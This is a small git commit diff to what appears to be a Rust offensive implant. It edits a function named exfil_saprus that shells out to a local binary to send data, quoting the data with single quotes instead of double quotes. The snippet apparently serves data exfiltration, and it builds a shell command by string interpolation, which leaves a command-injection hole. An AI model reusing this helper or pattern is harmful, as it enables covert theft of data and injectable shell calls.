Use single quotes around json

This commit is contained in:
2025-04-11 14:27:31 -04:00
parent a6faae4612
commit b82a8ac525

View File

@@ -22,7 +22,7 @@ fn cd(path: &str) -> Result<(), std::io::Error> {
} }
fn exfil_saprus(data: &str) { fn exfil_saprus(data: &str) {
match execute_command(format!("/usr/local/sbin/adam -r \"{}\"", data).as_str()) { match execute_command(format!("/usr/local/sbin/adam -r '{}'", data).as_str()) {
_ => (), _ => (),
} }
} }